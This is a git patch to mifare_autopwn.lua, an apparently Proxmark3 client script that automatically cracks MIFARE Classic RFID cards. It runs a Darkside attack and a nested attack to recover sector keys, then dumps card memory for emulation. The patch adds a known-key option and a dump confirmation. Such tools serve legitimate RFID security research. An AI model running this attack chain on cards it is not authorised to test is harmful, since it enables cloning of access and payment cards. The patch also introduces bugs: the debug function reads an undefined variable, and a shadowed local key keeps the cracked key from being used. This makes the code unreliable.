From 79494182cdb54def2b67266ae57ea24a1240b61e Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Sun, 10 Dec 2017 09:05:30 +0100 Subject: [PATCH] chg: 'script run mifare_autopwn' - added a option to use a key. --- client/scripts/mifare_autopwn.lua | 95 ++++++++++++++++++------------- 1 file changed, 55 insertions(+), 40 deletions(-) diff --git a/client/scripts/mifare_autopwn.lua b/client/scripts/mifare_autopwn.lua index f654244f0..4fba4178e 100644 --- a/client/scripts/mifare_autopwn.lua +++ b/client/scripts/mifare_autopwn.lua @@ -29,9 +29,17 @@ local DEBUG = false --- -- A debug printout-function local function dbg(args) - if DEBUG then - print(":: ", args) - end + if not DEBUG then return end + + if type(args) == 'table' then + local i = 1 + while result[i] do + dbg(result[i]) + i = i+1 + end + else + print('###', args) + end end --- -- This is only meant to be used when errors occur @@ -39,7 +47,6 @@ local function oops(err) print("ERROR: ",err) return nil,err end - --- -- Usage help local function help() @@ -47,7 +54,6 @@ local function help() print("Example usage") print(example) end - --- -- Waits for a mifare card to be placed within the vicinity of the reader. -- @return if successfull: an table containing card info @@ -76,24 +82,29 @@ local function nested(key,sak) else print("I don't know how many sectors there are on this type of card, defaulting to 16") end - local cmd = string.format("hf mf nested %d 0 A %s d",typ,key) + local cmd = string.format("hf mf nested %d 0 A %s d", typ, key) core.console(cmd) end local function dump(uid) - core.console("hf mf dump") - -- Save the global args, those are *our* arguments - local myargs = args - -- Set the arguments for htmldump script - args =("-o %s.html"):format(uid) - -- call it - require('../scripts/htmldump') + dbg('dumping tag memory') - args ="" - -- dump to emulator - require('../scripts/dumptoemul') - -- Set back args. Not that it's used, just for the karma... - args = myargs + if utils.confirm('Do you wish to create a memory dump of tag?') then + + core.console("hf mf dump") + -- Save the global args, those are *our* arguments + local myargs = args + -- Set the arguments for htmldump script + args =("-o %s.html"):format(uid) + -- call it + require('../scripts/htmldump') + + args ="" + -- dump to emulator + require('../scripts/dumptoemul') + -- Set back args. Not that it's used, just for the karma... + args = myargs + end end -- -- performs a test if tag nonce uses weak or hardend prng @@ -114,11 +125,13 @@ local function main(args) local verbose, exit, res, uid, err, _, sak local seen_uids = {} + local key = '' local print_message = true -- Read the parameters - for o, a in getopt.getopt(args, 'hd') do + for o, a in getopt.getopt(args, 'hdk:') do if o == "h" then help() return end if o == "d" then DEBUG = true end + if o == 'k' then key = a end end while not exit do @@ -131,9 +144,7 @@ local function main(args) -- Seen already? uid = res.uid sak = res.sak - - - + if not seen_uids[uid] then -- Store it seen_uids[uid] = uid @@ -141,25 +152,29 @@ local function main(args) -- check if PRNG is WEAK if perform_prng_test() then print("Card found, commencing crack on UID", uid) - -- Crack it - local key, cnt - err, res = core.mfDarkside() - if err == -1 then return oops("Button pressed. Aborted.") - elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).") - elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).") - elseif err == -4 then return oops([[ - Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown - generating polynomial with 16 effective bits only, but shows unexpected behaviour.]]) - elseif err == -5 then return oops("Aborted via keyboard.") - end - -- The key is actually 8 bytes, so a - -- 6-byte key is sent as 00XXXXXX - -- This means we unpack it as first - -- two bytes, then six bytes actual key data - -- We can discard first and second return values - _,_,key = bin.unpack("H2H6",res) - print("Found valid key: "..key); + if #key == 12 then + print("Using key: "..key); + else + -- Crack it + local key, cnt + err, res = core.mfDarkside() + if err == -1 then return oops("Button pressed. Aborted.") + elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).") + elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).") + elseif err == -4 then return oops([[ + Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown + generating polynomial with 16 effective bits only, but shows unexpected behaviour.]]) + elseif err == -5 then return oops("Aborted via keyboard.") + end + -- The key is actually 8 bytes, so a + -- 6-byte key is sent as 00XXXXXX + -- This means we unpack it as first + -- two bytes, then six bytes actual key data + -- We can discard first and second return values + _,_,key = bin.unpack("H2H6",res) + print("Found valid key: "..key); + end -- Use nested attack nested(key,sak) -- Dump info